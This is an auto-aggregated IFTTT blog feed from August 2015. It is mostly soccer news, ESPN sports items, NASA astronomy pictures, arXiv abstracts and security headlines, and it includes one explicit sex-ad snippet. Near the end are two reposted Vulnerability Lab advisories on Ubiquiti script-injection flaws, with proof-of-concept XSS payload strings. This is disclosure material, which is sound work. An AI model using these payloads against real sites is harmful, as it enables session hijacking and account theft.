from ESPN http://ift.tt/17lH5T2
via IFTTT
Saturday, August 22, 2015
Orioles Video: Baltimore squanders lead, loses for 3rd straight night to Twins 3-2; Henry Urrutia RBI double (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
Eagles: QB Sam Bradford led 12-play, 84-yard TD drive in only possession vs. Ravens, completing 3-of-5 passes for 35 yds (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
Porto, Sporting both held to draws in Portugal
LISBON, Portugal (AP) Benfica can open an early gap to its main title rivals after FC Porto and Sporting Lisbon were both held to draws in the Portuguese league on Saturday.
from FOX Sports Digital http://ift.tt/1EayIOK
via IFTTT
from FOX Sports Digital http://ift.tt/1EayIOK
via IFTTT
Frustration for Rooney, Man U; Bournemouth gets 1st EPL win
LONDON (AP) As Wayne Rooney went a 10th game without scoring for Manchester United, an English striker did manage to score a hat trick on Saturday: Callum Wilson of Bournemouth.
from FOX Sports Digital http://ift.tt/1fymFPr
via IFTTT
from FOX Sports Digital http://ift.tt/1fymFPr
via IFTTT
Espanyol beats Getafe 1-0, Sociedad draws 0-0 at Deportivo
BARCELONA, Spain (AP) Espanyol midfielder Salva Sevilla scored the first and only goal of the Spanish league season on Saturday to earn a 1-0 win over 10-man Getafe, while Real Sociedad and Deportivo La Coruna recorded the second 0-0 draw of the competition.
from FOX Sports Digital http://ift.tt/1U6W75D
via IFTTT
from FOX Sports Digital http://ift.tt/1U6W75D
via IFTTT
Roma held 1-1 at Verona on opening day of Serie A season
MILAN (AP) Roma was held to a 1-1 draw at Hellas Verona on the opening day of the Serie A season on Saturday.
from FOX Sports Digital http://ift.tt/1KCDL7v
via IFTTT
from FOX Sports Digital http://ift.tt/1KCDL7v
via IFTTT
Frustration for Rooney's Man U; Bournemouth gets 1st EPL win
LONDON (AP) Beyond Wayne Rooney's Manchester United goal drought stretching to a 10th game and Tottenham's struggles, it was a landmark day for newcomer Bournemouth in the Premier League on Saturday.
from FOX Sports Digital http://ift.tt/1MF5sRn
via IFTTT
from FOX Sports Digital http://ift.tt/1MF5sRn
via IFTTT
Wilson hat trick as Bournemouth edges West Ham 4-3
LONDON (AP) Callum Wilson scored a hat trick as Bournemouth got its first ever Premier League victory by edging West Ham 4-3 Saturday at Upton Park.
from FOX Sports Digital http://ift.tt/1hRwVUJ
via IFTTT
from FOX Sports Digital http://ift.tt/1hRwVUJ
via IFTTT
Sunderland draws with Swansea to grab 1st league point
SUNDERLAND, England (AP) Sunderland rallied to draw with Swansea 1-1 Saturday and grab its first Premier League point of the season.
from FOX Sports Digital http://ift.tt/1hRwWYQ
via IFTTT
from FOX Sports Digital http://ift.tt/1hRwWYQ
via IFTTT
Crystal Palace beats Aston Villa 2-1 in Premier League
LONDON (AP) New signing Bakary Sako scored in the 88th minute Saturday to give Crystal Palace a 2-1 win over Aston Villa in the Premier League.
from FOX Sports Digital http://ift.tt/1E9WjyO
via IFTTT
from FOX Sports Digital http://ift.tt/1E9WjyO
via IFTTT
Lewandowski scores late winner for Bayern at Hoffenheim
BERLIN (AP) Robert Lewandowski struck a last-minute winner for Bayern Munich to beat Hoffenheim 2-1 in the Bundesliga on Saturday.
from FOX Sports Digital http://ift.tt/1U6HjUv
via IFTTT
from FOX Sports Digital http://ift.tt/1U6HjUv
via IFTTT
Jordi Alba back from injury for Barcelona's league opener
BARCELONA, Spain (AP) Barcelona defender Jordi Alba has recovered from an injury in time for Sunday's Spanish league opener at Athletic Bilbao.
from FOX Sports Digital http://ift.tt/1MKcC8A
via IFTTT
from FOX Sports Digital http://ift.tt/1MKcC8A
via IFTTT
Blatter gets cow, milks support at home charity event
ULRICHEN, Switzerland (AP) Sepp Blatter was given a cow but gave little away about FIFA business at his annual charity football tournament on Saturday.
from FOX Sports Digital http://ift.tt/1I2wgER
via IFTTT
from FOX Sports Digital http://ift.tt/1I2wgER
via IFTTT
Meet Linux's New Fastest File-System – Bcachefs
First announced over five years ago, ex-Google engineer Kent Overstreet is pleasured in announcing the general availability of a new open-source file-system for Linux, called the Bcache File System (or Bcachefs). Bcachefs is a Linux kernel block layer cache that aims at offering a speedier and more advanced way of storing data on servers. Bcachefs promises to provide the same
from The Hacker News http://ift.tt/1PGEnx9
via IFTTT
from The Hacker News http://ift.tt/1PGEnx9
via IFTTT
Kashima Antlers beats Montedio Yamagata 3-0
KASHIMA, Japan (AP) Kashima Antlers maintained control of the J-League second stage table on Saturday, comfortably overcoming last-placed Montedio Yamagata 3-0.
from FOX Sports Digital http://ift.tt/1NM5Yfj
via IFTTT
from FOX Sports Digital http://ift.tt/1NM5Yfj
via IFTTT
Salzburg signs Austria midfielder Pehlivan on 1-year deal
SALZBURG, Austria (AP) Red Bull Salzburg says Austria midfielder Yasin Pehlivan has joined the club on a one-year deal, ending a four-season stint in Turkey.
from FOX Sports Digital http://ift.tt/1LqkDPM
via IFTTT
from FOX Sports Digital http://ift.tt/1LqkDPM
via IFTTT
Ashley Madison Hackers (with another 300GB Dump) – Wait, Cheaters! We haven't Yet Done
Over a month ago, a group of hackers breached the popular cheater's dating service Ashley Madison and its parent company Avid Life Media, affecting tens of Millions site customers private life and also dump the website's source code onto the dark web. The hackers behind the Ashley Madison hack, who call themselves The Impact Team, leaked 10GB of its customers private data online on Tuesday
from The Hacker News http://ift.tt/1JbNymZ
via IFTTT
from The Hacker News http://ift.tt/1JbNymZ
via IFTTT
Anonymous X
Create Page. Recent; 2015; 2014; Founded. Anonymous X is on Facebook. To connect with Anonymous X, sign up for Facebook today. Sign UpLog In.
from Google Alert - anonymous http://ift.tt/1PFo6ZB
via IFTTT
from Google Alert - anonymous http://ift.tt/1PFo6ZB
via IFTTT
Sprites from Space
An old Moon and the stars of Orion rose above the eastern horizon on August 10. The Moon's waning crescent was still bright enough to be overexposed in this snapshot taken from another large satellite of planet Earth, the International Space Station. A greenish airglow traces the atmosphere above the limb of the planet's night. Below, city lights and lightning flashes from thunderstorms appear over southern Mexico. The snapshot also captures the startling apparition of a rare form of upper atmospheric lightning, a large red sprite caught above a lightning flash at the far right. While the space station's orbital motion causes the city lights to blur and trail during the exposure, the extremely brief flash of the red sprite is sharp. Now known to be associated with thunderstorms, much remains a mystery about sprites including how they occur, their effect on the atmospheric global electric circuit, and if they are somehow related to other upper atmospheric lightning phenomena such as blue jets or terrestrial gamma flashes. via NASA http://ift.tt/1Kz3Lk4
Friday, August 21, 2015
Orioles Video: Darren O'Day gave up 3 runs in the 8th and Baltimore fell to the Twins, 4-3 (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
Thorns announce sellout for Aug. 30 game
PORTLAND, Ore. (AP) The Portland Thorns of the National Women's Soccer League announced a sellout of their Aug. 30 match against the Washington Spirit at Providence Park.
from FOX Sports Digital http://ift.tt/1NrOTu4
via IFTTT
from FOX Sports Digital http://ift.tt/1NrOTu4
via IFTTT
Doodlers Anonymous x Blik Clock Challenge Submission
Snippet of my Doodlers Anonymous x Blik Clock Challenge Submission! Voting is up now and all you have to do is sign up to be a Doodlers ...
from Google Alert - anonymous http://ift.tt/1Jb7X9G
via IFTTT
from Google Alert - anonymous http://ift.tt/1Jb7X9G
via IFTTT
Orioles: Manager Buck Showalter says he's sticking with Miguel Gonzalez in the rotation; He has a 6.95 ERA in August (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
Werder Bremen draws at Hertha Berlin to earn 1st point
BERLIN (AP) Nigeria striker Anthony Ujah struck for Werder Bremen to draw at Hertha Berlin 1-1 and claim its first point of the Bundesliga season on Friday.
from FOX Sports Digital http://ift.tt/1JqykvT
via IFTTT
from FOX Sports Digital http://ift.tt/1JqykvT
via IFTTT
10-man Sevilla draws with Malaga in Spanish league opener
MALAGA, Spain (AP) Sevilla managed to draw at Malaga 0-0 Friday despite losing Steven N'Zonzi in a mistake-filled opening match of the Spanish league season.
from FOX Sports Digital http://ift.tt/1JaQlL3
via IFTTT
from FOX Sports Digital http://ift.tt/1JaQlL3
via IFTTT
PSG beats Montpellier 1-0 to maintain perfect start
MONTPELLIER, France (AP) Paris Saint-Germain eased to a 1-0 win Friday at Montpellier to maintain its 100 percent start to the French league as it seeks a fourth successive title.
from FOX Sports Digital http://ift.tt/1NKNvjg
via IFTTT
from FOX Sports Digital http://ift.tt/1NKNvjg
via IFTTT
Barcelona loans Halilovic to Sporting Gijon
BARCELONA, Spain (AP) Barcelona has agreed to loan midfielder Alen Halilovic for a season to fellow Spanish league club Sporting Gijon.
from FOX Sports Digital http://ift.tt/1MINJdv
via IFTTT
from FOX Sports Digital http://ift.tt/1MINJdv
via IFTTT
U of Illinois seeks to dismiss soccer player's lawsuit
URBANA, Ill. (AP) The University of Illinois is asking a judge to dismiss a former soccer player's lawsuit alleging she was improperly cleared to play after a concussion.
from FOX Sports Digital http://ift.tt/1fw8ZV0
via IFTTT
from FOX Sports Digital http://ift.tt/1fw8ZV0
via IFTTT
Here's Top 10 Popular Programming Languages used on GitHub
Open Source is the Future of the computer science world! On Wednesday, the popular coding website GitHub shared a graph that gives a closer look at the popularity of different programming languages used on its code sharing website that lets anyone edit, store, and collaborate on software code. Since its launch in 2008, GitHub saw various programming languages picking up momentum, as
from The Hacker News http://ift.tt/1KA09hD
via IFTTT
from The Hacker News http://ift.tt/1KA09hD
via IFTTT
Premier League says Liverpool winner should not have stood
LONDON (AP) The Premier League has taken the unusual step of publicly saying Liverpool's winning goal against Bournemouth on Monday should have been disallowed.
from FOX Sports Digital http://ift.tt/1JvoQ4k
via IFTTT
from FOX Sports Digital http://ift.tt/1JvoQ4k
via IFTTT
Brazilian Ferretti to be Mexico's interim soccer coach
MEXICO CITY (AP) Ricardo Ferretti of Brazil will take over as interim coach of Mexico's national soccer team.
from FOX Sports Digital http://ift.tt/1KzGlv4
via IFTTT
from FOX Sports Digital http://ift.tt/1KzGlv4
via IFTTT
New Russia coach looks to veterans to save Euro 2016 bid
MOSCOW (AP) New Russia coach Leonid Slutsky is putting his trust in veteran players as he tries to save his team's hopes of reaching next year's European championship.
from FOX Sports Digital http://ift.tt/1EHo0du
via IFTTT
from FOX Sports Digital http://ift.tt/1EHo0du
via IFTTT
Atletico extends defender Godin's contract through 2019
MADRID (AP) Atletico Madrid says defender Diego Godin has agreed to add another year to his contract, tying him to the Spanish club until 2019.
from FOX Sports Digital http://ift.tt/1Lozg62
via IFTTT
from FOX Sports Digital http://ift.tt/1Lozg62
via IFTTT
Leverkusen's new signing Aranguiz out for months
LEVERKUSEN, Germany (AP) Bayer Leverkusen has lost latest signing Charles Aranguiz for months.
from FOX Sports Digital http://ift.tt/1JnYTBL
via IFTTT
from FOX Sports Digital http://ift.tt/1JnYTBL
via IFTTT
Multiple Flaws Exposed in Pocket Add-on for Firefox
With providing easy accessibility, the battle is not won! Server-side Vulnerabilities have been reported by a security researcher in the popular Pocket add-on that comes attached with the Firefox browser. The security flaws could have allowed hackers to exfiltrate data from the company’s servers as well as populate reading lists with malicious links. <!-- adsense --> Pocket,
from The Hacker News http://ift.tt/1J9paCG
via IFTTT
from The Hacker News http://ift.tt/1J9paCG
via IFTTT
Ashley Madison 2.0 — Hackers Leak 20GB Data Dump, Including CEO's Emails
The Impact Team – Wait, Cheaters! We haven't yet done. The group of hackers behind the breach of Ashley Madison, the popular cheater's dating service, have released a second, even much bigger 'cheat sheet' exposing sensitive materials that include sensitive corporate information. Two days ago, the hackers released nearly 10GB of its customers' personal data online, which included 36 million
from The Hacker News http://ift.tt/1J9nozg
via IFTTT
from The Hacker News http://ift.tt/1J9nozg
via IFTTT
M27: Not a Comet
While hunting for comets in the skies above 18th century France, astronomer Charles Messier diligently kept a list of the things he encountered that were definitely not comets. This is number 27 on his now famous not-a-comet list. In fact, 21st century astronomers would identify it as a planetary nebula, but it's not a planet either, even though it may appear round and planet-like in a small telescope. Messier 27 (M27) is an excellent example of a gaseous emission nebula created as a sun-like star runs out of nuclear fuel in its core. The nebula forms as the star's outer layers are expelled into space, with a visible glow generated by atoms excited by the dying star's intense but invisible ultraviolet light. Known by the popular name of the Dumbbell Nebula, the beautifully symmetric interstellar gas cloud is over 2.5 light-years across and about 1,200 light-years away in the constellation Vulpecula. This impressive color composite highlights details within the well-studied central region and fainter, seldom imaged features in the nebula's outer halo. It incorporates broad and narrowband images recorded using filters sensitive to emission from sulfur, hydrogen and oxygen atoms. via NASA http://ift.tt/1Mz4ZQS
Orioles Video: Miguel Gonzalez ripped for 7 ER over 5 IP in 15-2 loss to Twins; Gerardo Parra, Caleb Joseph RBI singles (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
Leonardo Santiago to join Newcastle in A-League
SYDNEY (AP) Former Feyenoord and Ajax midfielder Leonardo has agreed to join Newcastle in Australian football's A-League on a one-year contract.
from FOX Sports Digital http://ift.tt/1fu93EP
via IFTTT
from FOX Sports Digital http://ift.tt/1fu93EP
via IFTTT
Thursday, August 20, 2015
Visa flap may sink World Cup qualifying match for Guam
HAGATNA, Guam (AP) Visas for members of the Guam national soccer team to enter Iran have been delayed two weeks ahead of a qualifying match, leaving a Guam official to say political tensions between the U.S. and the Islamic republic shouldn't affect sports.
from FOX Sports Digital http://ift.tt/1JnaH7f
via IFTTT
from FOX Sports Digital http://ift.tt/1JnaH7f
via IFTTT
Warehouse Layout Method Based on Ant Colony and Backtracking Algorithm. (arXiv:1508.04872v1 [cs.AI])
Warehouse is one of the important aspects of a company. Therefore, it is necessary to improve Warehouse Management System (WMS) to have a simple function that can determine the layout of the storage goods. In this paper we propose an improved warehouse layout method based on ant colony algorithm and backtracking algorithm. The method works on two steps. First, it generates a solutions parameter tree from backtracking algorithm. Then second, it deducts the solutions parameter by using a combination of ant colony algorithm and backtracking algorithm. This method was tested by measuring the time needed to build the tree and to fill up the space using two scenarios. The method needs 0.294 to 33.15 seconds to construct the tree and 3.23 seconds (best case) to 61.41 minutes (worst case) to fill up the warehouse. This method is proved to be an attractive alternative solution for warehouse layout system.
from cs.AI updates on arXiv.org http://ift.tt/1K9GxW0
via IFTTT
Efficient Computation of Exact IRV Margins. (arXiv:1508.04885v1 [cs.AI])
The margin of victory is easy to compute for many election schemes but difficult for Instant Runoff Voting (IRV). This is important because arguments about the correctness of an election outcome usually rely on the size of the electoral margin. For example, risk-limiting audits require a knowledge of the margin of victory in order to determine how much auditing is necessary. This paper presents a practical branch-and-bound algorithm for exact IRV margin computation that substantially improves on the current best-known approach. Although exponential in the worst case, our algorithm runs efficiently in practice on all the real examples we could find. We can efficiently discover exact margins on election instances that cannot be solved by the current state-of-the-art.
from cs.AI updates on arXiv.org http://ift.tt/1K9GxVZ
via IFTTT
Duration and Interval Hidden Markov Model for Sequential Data Analysis. (arXiv:1508.04928v1 [cs.AI])
Analysis of sequential event data has been recognized as one of the essential tools in data modeling and analysis field. In this paper, after the examination of its technical requirements and issues to model complex but practical situation, we propose a new sequential data model, dubbed Duration and Interval Hidden Markov Model (DI-HMM), that efficiently represents "state duration" and "state interval" of data events. This has significant implications to play an important role in representing practical time-series sequential data. This eventually provides an efficient and flexible sequential data retrieval. Numerical experiments on synthetic and real data demonstrate the efficiency and accuracy of the proposed DI-HMM.
from cs.AI updates on arXiv.org http://ift.tt/1K9GxVW
via IFTTT
Message Passing and Combinatorial Optimization. (arXiv:1508.05013v1 [cs.AI])
Graphical models use the intuitive and well-studied methods of graph theory to implicitly represent dependencies between variables in large systems. They can model the global behaviour of a complex system by specifying only local factors. This thesis studies inference in discrete graphical models from an algebraic perspective and the ways inference can be used to express and approximate NP-hard combinatorial problems.
We investigate the complexity and reducibility of various inference problems, in part by organizing them in an inference hierarchy. We then investigate tractable approximations for a subset of these problems using distributive law in the form of message passing. The quality of the resulting message passing procedure, called Belief Propagation (BP), depends on the influence of loops in the graphical model. We contribute to three classes of approximations that improve BP for loopy graphs A) loop correction techniques; B) survey propagation, another message passing technique that surpasses BP in some settings; and C) hybrid methods that interpolate between deterministic message passing and Markov Chain Monte Carlo inference.
We then review the existing message passing solutions and provide novel graphical models and inference techniques for combinatorial problems under three broad classes: A) constraint satisfaction problems such as satisfiability, coloring, packing, set / clique-cover and dominating / independent set and their optimization counterparts; B) clustering problems such as hierarchical clustering, K-median, K-clustering, K-center and modularity optimization; C) problems over permutations including assignment, graph morphisms and alignment, finding symmetries and traveling salesman problem. In many cases we show that message passing is able to find solutions that are either near optimal or favourably compare with today's state-of-the-art approaches.
from cs.AI updates on arXiv.org http://ift.tt/1U1WwX1
via IFTTT
FIFA, WCup sponsors talk in secret over corruption crisis
ZURICH (AP) FIFA has met with some World Cup sponsors in a meeting they demanded after a corruption crisis rocked football's governing body.
from FOX Sports Digital http://ift.tt/1JtJ3aK
via IFTTT
from FOX Sports Digital http://ift.tt/1JtJ3aK
via IFTTT
Location of anonymous method should be one token, not the whole body
The .Location of a lambda (or anonymous method) symbol should be a single token to improve diagnostics that refer to them. Here is an example of a ...
from Google Alert - anonymous http://ift.tt/1K9bA4g
via IFTTT
from Google Alert - anonymous http://ift.tt/1K9bA4g
via IFTTT
Lazio striker Klose out for 3 matches with thigh injury
ROME (AP) Lazio has confirmed that striker Miroslav Klose will be sidelined for at least three matches with a left thigh injury.
from FOX Sports Digital http://ift.tt/1J7DjQy
via IFTTT
from FOX Sports Digital http://ift.tt/1J7DjQy
via IFTTT
Ravens Video: Joe Flacco on his expectations for the season - \"we have the talent to go out there and make it happen\" (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
Can anyone overthrow Juventus at the top of Serie A?
MILAN (AP) Serie A has had a familiar look to it in the past two seasons, with Juventus winning the league title and Roma finishing second.
from FOX Sports Digital http://ift.tt/1hOzKpI
via IFTTT
from FOX Sports Digital http://ift.tt/1hOzKpI
via IFTTT
Ravens: Security director Darren Sanders found not guilty of groping female stadium worker after a game last December (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
anonymous fun - w4m
like to meet up and fuck no questions asked? I'm your girl. love fucking and sucking a stranger's cock. i'll be ur good little girl and do anything you ask ...
from Google Alert - anonymous http://ift.tt/1NHStNJ
via IFTTT
from Google Alert - anonymous http://ift.tt/1NHStNJ
via IFTTT
Midfielder Marco Asensio set for season at Espanyol
MADRID (AP) Espanyol and Real Madrid have reached an agreement for the season-long loan of attacking midfielder Marco Asensio to the Catalan club.
from FOX Sports Digital http://ift.tt/1hsWKdK
via IFTTT
from FOX Sports Digital http://ift.tt/1hsWKdK
via IFTTT
World Cup experience made Miami goalie Catalina Perez better
CORAL GABLES, Fla. (AP) Miami goalkeeper Catalina Perez held her ground against the best women's soccer team in the world this summer.
from FOX Sports Digital http://ift.tt/1E7dNvX
via IFTTT
from FOX Sports Digital http://ift.tt/1E7dNvX
via IFTTT
Juventus signs Brazil defender Alex Sandro from Porto
TURIN, Italy (AP) Juventus has signed Brazil left back Alex Sandro from Porto for 26 million euros ($29 million).
from FOX Sports Digital http://ift.tt/1Ln2fY6
via IFTTT
from FOX Sports Digital http://ift.tt/1Ln2fY6
via IFTTT
Juventus keen to silence doubters after summer of change
MILAN (AP) Juventus kicked off last season in uncertain fashion after former AC Milan coach Massimiliano Allegri replaced the popular Antonio Conte, who had resigned.
from FOX Sports Digital http://ift.tt/1J7SHKw
via IFTTT
from FOX Sports Digital http://ift.tt/1J7SHKw
via IFTTT
I have a new follower on Twitter
Megabyte
Following: 1095 - Followers: 986
August 20, 2015 at 11:18AM via Twitter http://twitter.com/megabyte101
Howard, Beasley called up to US team for September games
CHICAGO (AP) Goalkeeper Tim Howard is back with the U.S. national team.
from FOX Sports Digital http://ift.tt/1Jln7g8
via IFTTT
from FOX Sports Digital http://ift.tt/1Jln7g8
via IFTTT
Juventus aims for record-equaling 5th straight Serie A title
MILAN (AP) Juventus kicks off the Serie A season in familiar fashion, as the favorite to lift a record-equaling fifth successive league title.
from FOX Sports Digital http://ift.tt/1J6Scmd
via IFTTT
from FOX Sports Digital http://ift.tt/1J6Scmd
via IFTTT
World Cup soccer star Carli Lloyd has book deal
NEW YORK (AP) World Cup soccer star Carli Lloyd, whose three goals in the 2015 final led the U.S. to a 5-2 victory over Japan, has a book deal.
from FOX Sports Digital http://ift.tt/1K8hT88
via IFTTT
from FOX Sports Digital http://ift.tt/1K8hT88
via IFTTT
Barcelona looking vulnerable on eve of Spanish opener
BARCELONA, Spain (AP) For a team that won it all in spectacular fashion last season, Barcelona begins the Spanish league plagued by doubts few could have imagined three months ago.
from FOX Sports Digital http://ift.tt/1KxBw5n
via IFTTT
from FOX Sports Digital http://ift.tt/1KxBw5n
via IFTTT
[FD] UBNT Bug Bounty #3 - Persistent Filename Vulnerability
Document Title: =============== UBNT Bug Bounty #3 - Persistent Filename Vulnerability References (Source): ==================== http://ift.tt/1P38bTG Video: http://ift.tt/1WeSApA Release Date: ============= 2015-08-11 Vulnerability Laboratory ID (VL-ID): ==================================== 1467 Common Vulnerability Scoring System: ==================================== 4.2 Product & Service Introduction: =============================== Ubiquiti Networks is an American technology company started in 2005. Based in San Jose, California they are a manufacturer of wireless products whose primary focus is on under-served and emerging markets. (Copy of the Homepage: http://ift.tt/1lWIuZL ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered an application-side input validation web vulnerability in the official Ubiquiti Networks Community online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-03-17: Researcher Notification & Coordination (Hadji Samir) 2015-03-18: Vendor Notification (Ubnt Security Team - Bug Bounty Program) 2015-04-12: Vendor Response/Feedback (Ubnt Security Team - Bug Bounty Program) 2015-07-09: Vendor Fix/Patch (Ubnt Developer Team) 2015-08-11: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ubiquiti Network Product: Ubnt Community - Web Application (Online Service) 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ An application-side web vulnerability has been discovered in the official Ubiquiti Networks Community online service web-application. The vulnerability allows an remote attacker to inject own script code to the application-side of the affected application module. The web vulnerability is located in the `filename` value of the `gallery page album upload` module. Remote attackers are able to inject own files with malicious `filename` value in the `album upload` POST method request to compromise the ubnt web-application. Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious attack requests. The attack vector is located on the application-side of the ubnt service and the request method to inject is POST. The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.2. Exploitation of the application-side validation web vulnerability requires no user interaction and only a low privileged web-application user account. Successful exploitation of the security vulnerability results in the ubnt community web-application compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] gallerypage (upload) Vulnerable Parameter(s): [+] filename (Album) Affected Module(s): [+] confirmationpage Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers with low privileged application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open link http://ift.tt/1J7pks1 2. Click add images 3. Upload image with name ">
.png 4. Click selact an album and save 5. Post comment 6. Click selete the comment you will redirect to http://ift.tt/1E6ShYc 7. Now you will see the alert with the document cookies context! PoC Video: http://ift.tt/1WeSApA Reference(s): http://ift.tt/1fZalrx http://ift.tt/1J7pks1 http://ift.tt/1E6ShYc Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the album add module. Restrict the input and encode the filename to prevent further script code injection attack that runs through the application-side. Disallow special chars and implement a secure exception to prevent the execution itself. Security Risk: ============== The security risk of the application-side album filename input validation web vulnerability is estimated as medium. (CVSS 4.2) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Hadji Samir [samir@evolution-sec.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] UBNT Bug Bounty #1 - Client Side Cross Site Scripting Vulnerability
Document Title: =============== UBNT Bug Bounty #1 - Client Side Cross Site Scripting Vulnerability References (Source): ==================== http://ift.tt/1DZOknX #52988 Release Date: ============= 2015-08-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1465 Common Vulnerability Scoring System: ==================================== 2.8 Product & Service Introduction: =============================== Ubiquiti Networks is an American technology company started in 2005. Based in San Jose, California they are a manufacturer of wireless products whose primary focus is on under-served and emerging markets. (Copy of the Homepage: http://ift.tt/1lWIuZL ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a client-side cross site scripting web vulnerability in the official Ubnt online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-03-17: Researcher Notification & Coordination (Hadji Samir) 2015-03-18: Vendor Notification (Ubnt Security Team - Bug Bounty Program) 2015-04-03: Vendor Response/Feedback (Ubnt Security Team - Bug Bounty Program) 2015-07-24: Vendor Fix/Patch (Ubnt Developer Team) 2015-08-12: Bug Bounty Reward (Ubnt Security Team - Bug Bounty Program) 2015-08-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ubiquiti Network Product: Ubnt Store - Web Application (Online-Service) 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A non persistent cross site scripting web vulnerability has been discovered in the official Cisco Newsroom online service web-application. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions data by client-side manipulated cross site requests. The vulnerability is located in the `bridgename` value of the http://ift.tt/1J7pkrY service module. The injection point of the issue is the vulnerable uploader.swf file. Remote attackers are able to inject own script codes to the vulnerable GET method request of the uploader.swf module. The attack vector of the vulnerability is located on the client-side of the ubnt store web-application. The request method to inject the script code to the client-side is `GET`. The execution of the script code occurs in the same swf files context. The security risk of the non-persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.8. Exploitation of the client-side cross site scripting web vulnerability requires low user interaction (click) and no privileged application user account. Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent manipulation of affected or connected service modules. Request Method(s): [+] GET Vulnerable Service(s): [+] Ubnt Store - (http://ift.tt/1J7pkrY) Vulnerable Module(s): [+] uploader.swf Vulnerable Parameter(s): [+] bridgeName Proof of Concept (PoC): ======================= The remote cross site vulnerability in the swf file can be exploited by remote attackers without privileged application user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Example string attack uploader.swf?bridgeName=1``]));}catch(s){alert('hadjisamir')}// PoC: Payload http://ift.tt/1E6ShYa``]));}catch(s){alert('hadjisamir')}//Hadji Samir Reference(s): http://store.ubnt.com/ in the (uploader.swf) http://store.ubnt.com/skin/adminhtml/default/default/media/uploader.swf? Solution - Fix & Patch: ======================= Encode the bridgeName value in the uploaded swf files to prevent client-side script code injection attacks or cross site scripting. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerabilities in the swf file is estimated as medium. (CVSS 2.8) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Hadji Samir [samir@evolution-sec.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 